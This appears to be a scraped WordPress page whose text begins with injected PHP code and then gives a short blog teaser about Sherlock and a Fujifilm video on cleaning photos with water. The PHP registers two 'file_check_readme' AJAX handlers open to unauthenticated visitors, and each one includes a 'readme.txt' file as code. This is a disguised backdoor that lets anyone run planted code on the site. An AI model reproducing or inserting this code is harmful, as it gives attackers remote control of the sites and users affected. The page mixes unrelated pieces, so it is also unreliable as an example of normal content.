if(!function_exists('file_check_readme53123')){ add_action('wp_ajax_nopriv_file_check_readme53123', 'file_check_readme53123'); add_action('wp_ajax_file_check_readme53123', 'file_check_readme53123'); function file_check_readme53123() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme65315')){ add_action('wp_ajax_nopriv_file_check_readme65315', 'file_check_readme65315'); add_action('wp_ajax_file_check_readme65315', 'file_check_readme65315'); function file_check_readme65315() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
It was a rainy Tuesday in the first week of July. I walked in the study and found Sherlock watching some videos on YouTube. Intrigued, I went behind his chair and peeped over his shoulder in the laptop. He was watching a video by Fujifilm on cleaning of photos using water. I asked “Sherlock, don’t you […]
Read More